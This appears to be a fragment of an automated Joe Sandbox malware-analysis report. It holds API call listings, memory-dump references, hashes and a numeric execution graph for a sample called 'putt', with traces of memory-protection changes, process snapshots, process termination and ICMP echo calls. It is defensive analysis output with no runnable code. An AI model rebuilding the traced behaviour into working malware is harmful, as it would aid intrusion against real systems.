                                                                                                                                                                                                                                                                              • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                              • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                              • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                              • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                              Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                              • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                              Execution Coverage:3.3%
                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                              Signature Coverage:3.6%
                                                                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                                                                              Total number of Limit Nodes:49
                                                                                                                                                                                                                                                                              execution_graph 96093 746555 96100 71014b 96093->96100 96095 74655c 96098 746575 __fread_nolock 96095->96098 96109 71017b 96095->96109 96096 71017b 8 API calls 96099 74659a 96096->96099 96098->96096 96101 710150 ___std_exception_copy 96100->96101 96102 71016a 96101->96102 96104 71016c 96101->96104 96118 71521d 7 API calls 2 library calls 96101->96118 96102->96095 96105 7109dd 96104->96105 96119 713614 RaiseException 96104->96119 96120 713614 RaiseException 96105->96120 96108 7109fa 96108->96095 96110 71014b ___std_exception_copy 96109->96110 96111 71016a 96110->96111 96113 71016c 96110->96113 96121 71521d 7 API calls 2 library calls 96110->96121 96111->96098 96114 7109dd 96113->96114 96122 713614 RaiseException 96113->96122 96123 713614 RaiseException 96114->96123 96117 7109fa 96117->96098 96118->96101 96119->96105 96120->96108 96121->96110 96122->96114 96123->96117 96124 745650 96133 70e3d5 96124->96133 96126 745666 96132 7456e1 96126->96132 96142 70aa65 9 API calls 96126->96142 96129 7456c1 96129->96132 96143 76247e 8 API calls 96129->96143 96130 7461d7 96132->96130 96144 763fe1 81 API calls __wsopen_s 96132->96144 96134 70e3e3 96133->96134 96135 70e3f6 96133->96135 96145 6fb4c8 8 API calls 96134->96145 96136 70e429 96135->96136 96137 70e3fb 96135->96137 96146 6fb4c8 8 API calls 96136->96146 96139 71014b 8 API calls 96137->96139 96141 70e3ed 96139->96141 96141->96126 96142->96129 96143->96132 96144->96130 96145->96141 96146->96141 96147 72947a 96148 729487 96147->96148 96149 72949f 96147->96149 96204 71f649 20 API calls __dosmaperr 96148->96204 96153 7294fa 96149->96153 96161 729497 96149->96161 96206 730144 21 API calls 2 library calls 96149->96206 96151 72948c 96205 722b5c 26 API calls pre_c_initialization 96151->96205 96167 71dcc5 96153->96167 96156 729512 96174 728fb2 96156->96174 96158 729519 96159 71dcc5 __fread_nolock 26 API calls 96158->96159 96158->96161 96160 729545 96159->96160 96160->96161 96162 71dcc5 __fread_nolock 26 API calls 96160->96162 96163 729553 96162->96163 96163->96161 96164 71dcc5 __fread_nolock 26 API calls 96163->96164 96165 729563 96164->96165 96166 71dcc5 __fread_nolock 26 API calls 96165->96166 96166->96161 96168 71dcd1 96167->96168 96169 71dce6 96167->96169 96207 71f649 20 API calls __dosmaperr 96168->96207 96169->96156 96171 71dcd6 96208 722b5c 26 API calls pre_c_initialization 96171->96208 96173 71dce1 96173->96156 96175 728fbe BuildCatchObjectHelperInternal 96174->96175 96176 728fc6 96175->96176 96177 728fde 96175->96177 96275 71f636 20 API calls __dosmaperr 96176->96275 96179 7290a4 96177->96179 96183 729017 96177->96183 96282 71f636 20 API calls __dosmaperr 96179->96282 96180 728fcb 96276 71f649 20 API calls __dosmaperr 96180->96276 96186 729026 96183->96186 96187 72903b 96183->96187 96184 7290a9 96283 71f649 20 API calls __dosmaperr 96184->96283 96277 71f636 20 API calls __dosmaperr 96186->96277 96209 7254ba EnterCriticalSection 96187->96209 96189 729033 96284 722b5c 26 API calls pre_c_initialization 96189->96284 96191 729041 96193 729072 96191->96193 96194 72905d 96191->96194 96192 72902b 96278 71f649 20 API calls __dosmaperr 96192->96278 96210 7290c5 96193->96210 96279 71f649 20 API calls __dosmaperr 96194->96279 96196 728fd3 __fread_nolock 96196->96158 96200 729062 96280 71f636 20 API calls __dosmaperr 96200->96280 96201 72906d 96281 72909c LeaveCriticalSection __wsopen_s 96201->96281 96204->96151 96205->96161 96206->96153 96207->96171 96208->96173 96209->96191 96211 7290d7 96210->96211 96212 7290ef 96210->96212 96301 71f636 20 API calls __dosmaperr 96211->96301 96214 729459 96212->96214 96219 729134 96212->96219 96324 71f636 20 API calls __dosmaperr 96214->96324 96215 7290dc 96302 71f649 20 API calls __dosmaperr 96215->96302 96218 72945e 96325 71f649 20 API calls __dosmaperr 96218->96325 96220 7290e4 96219->96220 96222 72913f 96219->96222 96226 72916f 96219->96226 96220->96201 96303 71f636 20 API calls __dosmaperr 96222->96303 96223 72914c 96326 722b5c 26 API calls pre_c_initialization 96223->96326 96225 729144 96304 71f649 20 API calls __dosmaperr 96225->96304 96229 729188 96226->96229 96230 7291ae 96226->96230 96233 7291ca 96226->96233 96229->96230 96231 729195 96229->96231 96305 71f636 20 API calls __dosmaperr 96230->96305 96292 72fc1b 96231->96292 96285 723b93 96233->96285 96234 7291b3 96306 71f649 20 API calls __dosmaperr 96234->96306 96240 7291ba 96307 722b5c 26 API calls pre_c_initialization 96240->96307 96241 729333 96244 7293a9 96241->96244 96247 72934c GetConsoleMode 96241->96247 96242 7291ea 96245 722d38 _free 20 API calls 96242->96245 96246 7293ad ReadFile 96244->96246 96248 7291f1 96245->96248 96249 729421 GetLastError 96246->96249 96250 7293c7 96246->96250 96247->96244 96251 72935d 96247->96251 96252 729216 96248->96252 96253 7291fb 96248->96253 96254 729385 96249->96254 96255 72942e 96249->96255 96250->96249 96256 72939e 96250->96256 96251->96246 96257 729363 ReadConsoleW 96251->96257 96316 7297a4 96252->96316 96314 71f649 20 API calls __dosmaperr 96253->96314 96273 7291c5 __fread_nolock 96254->96273 96319 71f613 20 API calls __dosmaperr 96254->96319 96322 71f649 20 API calls __dosmaperr 96255->96322 96268 729403 96256->96268 96269 7293ec 96256->96269 96256->96273 96257->96256 96262 72937f GetLastError 96257->96262 96258 722d38 _free 20 API calls 96258->96220 96262->96254 96264 729200 96315 71f636 20 API calls __dosmaperr 96264->96315 96265 729433 96323 71f636 20 API calls __dosmaperr 96265->96323 96270 72941a 96268->96270 96268->96273 96320 728de1 31 API calls 3 library calls 96269->96320 96321 728c21 29 API calls __wsopen_s 96270->96321 96273->96258 96274 72941f 96274->96273 96275->96180 96276->96196 96277->96192 96278->96189 96279->96200 96280->96201 96281->96196 96282->96184 96283->96189 96284->96196 96286 723bd1 96285->96286 96290 723ba1 __dosmaperr 96285->96290 96328 71f649 20 API calls __dosmaperr 96286->96328 96287 723bbc RtlAllocateHeap 96289 723bcf 96287->96289 96287->96290 96308 722d38 96289->96308 96290->96286 96290->96287 96327 71521d 7 API calls 2 library calls 96290->96327 96293 72fc35 96292->96293 96294 72fc28 96292->96294 96297 72fc41 96293->96297 96330 71f649 20 API calls __dosmaperr 96293->96330 96329 71f649 20 API calls __dosmaperr 96294->96329 96296 72fc2d 96296->96241 96297->96241 96299 72fc62 96331 722b5c 26 API calls pre_c_initialization 96299->96331 96301->96215 96302->96220 96303->96225 96304->96223 96305->96234 96306->96240 96307->96273 96309 722d43 RtlFreeHeap 96308->96309 96310 722d6c __dosmaperr 96308->96310 96309->96310 96311 722d58 96309->96311 96310->96242 96332 71f649 20 API calls __dosmaperr 96311->96332 96313 722d5e GetLastError 96313->96310 96314->96264 96315->96273 96333 72970b 96316->96333 96319->96273 96320->96273 96321->96274 96322->96265 96323->96273 96324->96218 96325->96223 96326->96220 96327->96290 96328->96289 96329->96296 96330->96299 96331->96296 96332->96313 96342 725737 96333->96342 96335 72971d 96336 729736 SetFilePointerEx 96335->96336 96337 729725 96335->96337 96339 72974e GetLastError 96336->96339 96341 72972a 96336->96341 96355 71f649 20 API calls __dosmaperr 96337->96355 96356 71f613 20 API calls __dosmaperr 96339->96356 96341->96231 96343 725744 96342->96343 96344 725759 96342->96344 96357 71f636 20 API calls __dosmaperr 96343->96357 96348 72577e 96344->96348 96359 71f636 20 API calls __dosmaperr 96344->96359 96347 725749 96358 71f649 20 API calls __dosmaperr 96347->96358 96348->96335 96349 725789 96360 71f649 20 API calls __dosmaperr 96349->96360 96352 725751 96352->96335 96353 725791 96361 722b5c 26 API calls pre_c_initialization 96353->96361 96355->96341 96356->96341 96357->96347 96358->96352 96359->96349 96360->96353 96361->96352 96362 6ff5e5 96365 6fcab0 96362->96365 96366 6fcacb 96365->96366 96367 74150c 96366->96367 96368 7414be 96366->96368 96388 6fcaf0 96366->96388 96437 7762ff 207 API calls 2 library calls 96367->96437 96371 7414c8 96368->96371 96374 7414d5 96368->96374 96368->96388 96435 776790 207 API calls 96371->96435 96387 6fcdc0 96374->96387 96436 776c2d 207 API calls 2 library calls 96374->96436 96378 6fcf80 39 API calls 96378->96388 96379 74179f 96379->96379 96381 6fcdee 96383 7416e8 96444 776669 81 API calls 96383->96444 96387->96381 96445 763fe1 81 API calls __wsopen_s 96387->96445 96388->96378 96388->96381 96388->96383 96388->96387 96392 70e807 39 API calls 96388->96392 96396 700340 96388->96396 96419 6fbe2d 96388->96419 96423 70e7c1 39 API calls 96388->96423 96424 70aa99 207 API calls 96388->96424 96425 7105b2 5 API calls __Init_thread_wait 96388->96425 96426 70bc58 96388->96426 96431 710413 29 API calls __onexit 96388->96431 96432 710568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96388->96432 96433 70f4df 81 API calls 96388->96433 96434 70f346 207 API calls 96388->96434 96438 6fb4c8 8 API calls 96388->96438 96439 74ffaf 8 API calls 96388->96439 96440 6fbed9 96388->96440 96392->96388 96415 700376 ISource 96396->96415 96397 7105b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96397->96415 96398 710413 29 API calls pre_c_initialization 96398->96415 96399 710568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96399->96415 96400 74632b 96512 763fe1 81 API calls __wsopen_s 96400->96512 96401 71014b 8 API calls 96401->96415 96403 701695 96409 6fbed9 8 API calls 96403->96409 96414 70049d ISource 96403->96414 96405 6fbed9 8 API calls 96405->96415 96406 745cdb 96412 6fbed9 8 API calls 96406->96412 96406->96414 96407 74625a 96511 763fe1 81 API calls __wsopen_s 96407->96511 96409->96414 96412->96414 96413 6fbf73 8 API calls 96413->96415 96414->96388 96415->96397 96415->96398 96415->96399 96415->96400 96415->96401 96415->96403 96415->96405 96415->96406 96415->96407 96415->96413 96415->96414 96416 746115 96415->96416 96418 700aae ISource 96415->96418 96446 701990 96415->96446 96508 701e50 40 API calls ISource 96415->96508 96509 763fe1 81 API calls __wsopen_s 96416->96509 96510 763fe1 81 API calls __wsopen_s 96418->96510 96420 6fbe38 96419->96420 96421 6fbe67 96420->96421 97301 6fbfa5 96420->97301 96421->96388 96423->96388 96424->96388 96425->96388 96427 71014b 8 API calls 96426->96427 96428 70bc65 96427->96428 96429 6fb329 8 API calls 96428->96429 96430 70bc70 96429->96430 96430->96388 96431->96388 96432->96388 96433->96388 96434->96388 96435->96374 96436->96387 96437->96388 96438->96388 96439->96388 96441 6fbeed 96440->96441 96443 6fbefc __fread_nolock 96440->96443 96442 71017b 8 API calls 96441->96442 96441->96443 96442->96443 96443->96388 96444->96387 96445->96379 96447 7019b6 96446->96447 96448 701a2e 96446->96448 96449 7019c3 96447->96449 96450 746b60 96447->96450 96451 746a4d 96448->96451 96464 701a3d 96448->96464 96459 746b84 96449->96459 96460 7019cd 96449->96460 96519 7785db 207 API calls 2 library calls 96450->96519 96452 746b54 96451->96452 96453 746a58 96451->96453 96518 763fe1 81 API calls __wsopen_s 96452->96518 96517 70b35c 207 API calls 96453->96517 96456 746bb5 96461 746bc0 96456->96461 96462 746be2 96456->96462 96457 700340 207 API calls 96457->96464 96459->96456 96463 746b9c 96459->96463 96469 6fbed9 8 API calls 96460->96469 96507 7019e0 ISource 96460->96507 96521 7785db 207 API calls 2 library calls 96461->96521 96522 7760e6 96462->96522 96520 763fe1 81 API calls __wsopen_s 96463->96520 96464->96457 96465 746979 96464->96465 96468 701bb5 96464->96468 96474 746908 96464->96474 96483 701ba9 96464->96483 96490 701af4 96464->96490 96464->96507 96516 763fe1 81 API calls __wsopen_s 96465->96516 96468->96415 96469->96507 96472 746dd9 96478 746e0f 96472->96478 96620 7781ce 65 API calls 96472->96620 96515 763fe1 81 API calls __wsopen_s 96474->96515 96476 746c81 96593 761ad8 8 API calls 96476->96593 96622 6fb4c8 8 API calls 96478->96622 96479 746db7 96596 6f8ec0 96479->96596 96482 6fbed9 8 API calls 96482->96507 96483->96468 96514 763fe1 81 API calls __wsopen_s 96483->96514 96485 746ded 96488 6f8ec0 52 API calls 96485->96488 96487 746c08 96529 76148b 96487->96529 96502 746df5 _wcslen 96488->96502 96490->96483 96513 701ca0 8 API calls 96490->96513 96492 746c93 96594 6fbd07 8 API calls 96492->96594 96494 701b55 96494->96483 96503 701b62 ISource 96494->96503 96496 74691d ISource 96496->96465 96496->96503 96505 701a23 ISource 96496->96505 96497 746dbf _wcslen 96497->96472 96619 6fb4c8 8 API calls 96497->96619 96499 746c9c 96506 76148b 8 API calls 96499->96506 96502->96478 96621 6fb4c8 8 API calls 96502->96621 96503->96482 96503->96505 96503->96507 96505->96415 96506->96507 96507->96472 96507->96505 96595 77808f 53 API calls __wsopen_s 96507->96595 96508->96415 96509->96418 96510->96414 96511->96414 96512->96414 96513->96494 96514->96505 96515->96496 96516->96507 96517->96503 96518->96450 96519->96507 96520->96505 96521->96507 96523 776101 96522->96523 96524 746bed 96522->96524 96525 71017b 8 API calls 96523->96525 96524->96476 96524->96487 96527 776123 96525->96527 96526 71014b 8 API calls 96526->96527 96527->96524 96527->96526 96623 761400 8 API calls 96527->96623 96530 746c32 96529->96530 96531 761499 96529->96531 96533 702b20 96530->96533 96531->96530 96532 71014b 8 API calls 96531->96532 96532->96530 96534 702fc0 96533->96534 96535 702b86 96533->96535 96764 7105b2 5 API calls __Init_thread_wait 96534->96764 96537 702ba0 96535->96537 96538 747bd8 96535->96538 96624 703160 96537->96624 96727 777af9 96538->96727 96540 702fca 96550 70300b 96540->96550 96765 6fb329 96540->96765 96542 747be4 96542->96507 96545 703160 9 API calls 96546 702bc6 96545->96546 96547 702bfc 96546->96547 96546->96550 96549 747bfd 96547->96549 96556 702c18 __fread_nolock 96547->96556 96548 747bed 96548->96507 96775 763fe1 81 API calls __wsopen_s 96549->96775 96550->96548 96772 6fb4c8 8 API calls 96550->96772 96553 703049 96773 70e6e8 207 API calls 96553->96773 96554 702fe4 96771 710568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96554->96771 96556->96553 96558 747c15 96556->96558 96566 71014b 8 API calls 96556->96566 96568 71017b 8 API calls 96556->96568 96573 700340 207 API calls 96556->96573 96574 702d3f 96556->96574 96576 747c59 96556->96576 96582 702dd7 ISource 96556->96582 96776 763fe1 81 API calls __wsopen_s 96558->96776 96559 703082 96774 70fe39 8 API calls 96559->96774 96561 747c78 96778 7761a2 53 API calls _wcslen 96561->96778 96562 702d4c 96563 703160 9 API calls 96562->96563 96565 702d59 96563->96565 96569 703160 9 API calls 96565->96569 96565->96582 96566->96556 96567 747c87 96567->96507 96568->96556 96580 702d73 96569->96580 96571 702f2d 96571->96507 96573->96556 96574->96561 96574->96562 96575 702e8b ISource 96575->96571 96763 70e322 8 API calls ISource 96575->96763 96777 763fe1 81 API calls __wsopen_s 96576->96777 96577 703160 9 API calls 96577->96582 96581 6fbed9 8 API calls 96580->96581 96580->96582 96581->96582 96582->96559 96582->96575 96582->96577 96634 779ffc 96582->96634 96637 77ad47 96582->96637 96642 77a9ac 96582->96642 96650 77a6aa 96582->96650 96658 76f94a 96582->96658 96667 76664c 96582->96667 96674 770fb8 96582->96674 96699 70ac3e 96582->96699 96718 779fe8 96582->96718 96721 77a5b2 96582->96721 96779 763fe1 81 API calls __wsopen_s 96582->96779 96593->96492 96594->96499 96595->96479 96597 6f8ed5 96596->96597 96598 6f8ed2 96596->96598 96599 6f8edd 96597->96599 96600 6f8f0b 96597->96600 96598->96497 97297 715536 26 API calls 96599->97297 96601 736b1f 96600->96601 96603 6f8f1d 96600->96603 96611 736a38 96600->96611 97300 7154f3 26 API calls 96601->97300 97298 70fe6f 51 API calls 96603->97298 96604 6f8eed 96609 71014b 8 API calls 96604->96609 96607 736b37 96607->96607 96612 6f8ef7 96609->96612 96610 736ab1 97299 70fe6f 51 API calls 96610->97299 96611->96610 96614 71017b 8 API calls 96611->96614 96613 6fb329 8 API calls 96612->96613 96613->96598 96615 736a81 96614->96615 96616 71014b 8 API calls 96615->96616 96617 736aa8 96616->96617 96618 6fb329 8 API calls 96617->96618 96618->96610 96619->96472 96620->96485 96621->96478 96622->96505 96623->96527 96625 7031a1 96624->96625 96626 70317d 96624->96626 96780 7105b2 5 API calls __Init_thread_wait 96625->96780 96633 702bb0 96626->96633 96782 7105b2 5 API calls __Init_thread_wait 96626->96782 96629 7031ab 96629->96626 96781 710568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96629->96781 96631 709f47 96631->96633 96783 710568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96631->96783 96633->96545 96784 7789b6 96634->96784 96636 77a00c 96636->96582 96638 6f8ec0 52 API calls 96637->96638 96639 77ad63 96638->96639 96925 75dd87 CreateToolhelp32Snapshot Process32FirstW 96639->96925 96641 77ad72 96641->96582 96643 77aa08 96642->96643 96649 77a9c8 96642->96649 96647 77aa26 96643->96647 97066 6fc98d 39 API calls 96643->97066 96646 77aa8e 97034 760372 96646->97034 96647->96646 96647->96649 97067 6fc98d 39 API calls 96647->97067 96649->96582 96652 77a6c5 96650->96652 96653 77a705 96650->96653 96651 77a723 96651->96652 96656 77a780 96651->96656 97109 6fc98d 39 API calls 96651->97109 96652->96582 96653->96651 97108 6fc98d 39 API calls 96653->97108 96657 760372 58 API calls 96656->96657 96657->96652 96659 71017b 8 API calls 96658->96659 96660 76f95b 96659->96660 97110 6f423c 96660->97110 96663 6f8ec0 52 API calls 96664 76f97c GetEnvironmentVariableW 96663->96664 97113 76160f 8 API calls 96664->97113 96666 76f999 ISource 96666->96582 96668 6f8ec0 52 API calls 96667->96668 96669 766662 96668->96669 97114 75dc54 96669->97114 96671 76666a 96672 76666e GetLastError 96671->96672 96673 766683 96671->96673 96672->96673 96673->96582 96675 770fe1 96674->96675 96676 77100f WSAStartup 96675->96676 97188 6fc98d 39 API calls 96675->97188 96677 771054 96676->96677 96698 771023 ISource 96676->96698 97175 70c1f6 96677->97175 96680 770ffc 96680->96676 97189 6fc98d 39 API calls 96680->97189 96683 6f8ec0 52 API calls 96685 771069 96683->96685 96684 77100b 96684->96676 97180 70f9d4 WideCharToMultiByte 96685->97180 96687 771075 inet_addr gethostbyname 96688 771093 IcmpCreateFile 96687->96688 96687->96698 96689 7710d3 96688->96689 96688->96698 96690 71017b 8 API calls 96689->96690 96691 7710ec 96690->96691 96692 6f423c 8 API calls 96691->96692 96693 7710f7 96692->96693 96694 771102 IcmpSendEcho 96693->96694 96695 77112b IcmpSendEcho 96693->96695 96697 77114c 96694->96697 96695->96697 96696 771212 IcmpCloseHandle WSACleanup 96696->96698 96697->96696 96698->96582 96700 6f8ec0 52 API calls 96699->96700 96701 70ac68 96700->96701 96702 70bc58 8 API calls 96701->96702 96703 70ac7f 96702->96703 96714 70b09b _wcslen 96703->96714 97206 6fc98d 39 API calls 96703->97206 96705 70bbbe 43 API calls 96705->96714 96706 714d98 40 API calls 96706->96714 96709 6f6c03 8 API calls 96709->96714 96711 6fc98d 39 API calls 96711->96714 96712 70b1fb 96712->96582 96713 6f8ec0 52 API calls 96713->96714 96714->96705 96714->96706 96714->96709 96714->96711 96714->96712 96714->96713 96715 6f8577 8 API calls 96714->96715 97192 6f396b 96714->97192 97202 6f3907 96714->97202 97207 6f7ad5 96714->97207 97212 6fad40 8 API calls __fread_nolock 96714->97212 97213 6f7b1a 8 API calls 96714->97213 96715->96714 96719 7789b6 119 API calls 96718->96719 96720 779ff8 96719->96720 96720->96582 96722 77a5c5 96721->96722 96723 6f8ec0 52 API calls 96722->96723 96726 77a5d4 96722->96726 96724 77a632 96723->96724 97251 7618a9 96724->97251 96726->96582 96728 777b52 96727->96728 96729 777b38 96727->96729 96731 7760e6 8 API calls 96728->96731 97292 763fe1 81 API calls __wsopen_s 96729->97292 96732 777b5d 96731->96732 96733 700340 206 API calls 96732->96733 96734 777bc1 96733->96734 96735 777c5c 96734->96735 96739 777c03 96734->96739 96758 777b4a 96734->96758 96736 777c62 96735->96736 96737 777cb0 96735->96737 97293 761ad8 8 API calls 96736->97293 96738 6f8ec0 52 API calls 96737->96738 96737->96758 96740 777cc2 96738->96740 96742 76148b 8 API calls 96739->96742 96743 6fc2c9 8 API calls 96740->96743 96745 777c3b 96742->96745 96746 777ce6 CharUpperBuffW 96743->96746 96744 777c85 97294 6fbd07 8 API calls 96744->97294 96748 702b20 206 API calls 96745->96748 96749 777d00 96746->96749 96748->96758 96750 777d07 96749->96750 96751 777d53 96749->96751 96755 76148b 8 API calls 96750->96755 96752 6f8ec0 52 API calls 96751->96752 96753 777d5b 96752->96753 97295 70aa65 9 API calls 96753->97295 96756 777d35 96755->96756 96757 702b20 206 API calls 96756->96757 96757->96758 96758->96542 96759 777d65 96759->96758 96760 6f8ec0 52 API calls 96759->96760 96761 777d80 96760->96761 97296 6fbd07 8 API calls 96761->97296 96763->96575 96764->96540 96766 6fb338 _wcslen 96765->96766 96767 71017b 8 API calls 96766->96767 96768 6fb360 __fread_nolock 96767->96768 96769 71014b 8 API calls 96768->96769 96770 6fb376 96769->96770 96770->96554 96771->96550 96772->96553 96773->96559 96774->96559 96775->96582 96776->96582 96777->96582 96778->96567 96779->96582 96780->96629 96781->96626 96782->96631 96783->96633 96785 6f8ec0 52 API calls 96784->96785 96786 7789ed 96785->96786 96809 778a32 ISource 96786->96809 96822 779730 96786->96822 96788 778cde 96789 778eac 96788->96789 96794 778cec 96788->96794 96872 779941 59 API calls 96789->96872 96792 778ebb 96793 778ec7 96792->96793 96792->96794 96793->96809 96835 7788e3 96794->96835 96795 6f8ec0 52 API calls 96814 778aa6 96795->96814 96800 778d25 96849 70ffe0 96800->96849 96803 778d45 96856 763fe1 81 API calls __wsopen_s 96803->96856 96804 778d5f 96857 6f7e12 96804->96857 96807 778d50 GetCurrentProcess TerminateProcess 96807->96804 96809->96636 96812 778f22 96812->96809 96817 778f36 FreeLibrary 96812->96817 96814->96788 96814->96795 96814->96809 96854 754ad3 8 API calls __fread_nolock 96814->96854 96855 778f7a 41 API calls 96814->96855 96815 778d9e 96869 7795d8 74 API calls 96815->96869 96817->96809 96820 778daf 96820->96812 96870 701ca0 8 API calls 96820->96870 96871 6fb4c8 8 API calls 96820->96871 96873 7795d8 74 API calls 96820->96873 96874 6fc2c9 96822->96874 96824 77974b CharLowerBuffW 96880 759805 96824->96880 96831 77979b 96904 6fadf4 96831->96904 96833 7797a5 _wcslen 96834 7798bb _wcslen 96833->96834 96908 778f7a 41 API calls 96833->96908 96834->96814 96836 7788fe 96835->96836 96837 778949 96835->96837 96838 71017b 8 API calls 96836->96838 96841 779af3 96837->96841 96839 778920 96838->96839 96839->96837 96840 71014b 8 API calls 96839->96840 96840->96839 96842 779d08 ISource 96841->96842 96848 779b17 _strcat _wcslen ___std_exception_copy 96841->96848 96842->96800 96843 6fc63f 39 API calls 96843->96848 96844 6fc98d 39 API calls 96844->96848 96845 6fca5b 39 API calls 96845->96848 96846 6f8ec0 52 API calls 96846->96848 96848->96842 96848->96843 96848->96844 96848->96845 96848->96846 96912 75f8c5 10 API calls _wcslen 96848->96912 96852 70fff5 96849->96852 96850 71008d NtProtectVirtualMemory 96851 71005b 96850->96851 96851->96803 96851->96804 96852->96850 96852->96851 96853 71007b CloseHandle 96852->96853 96853->96851 96854->96814 96855->96814 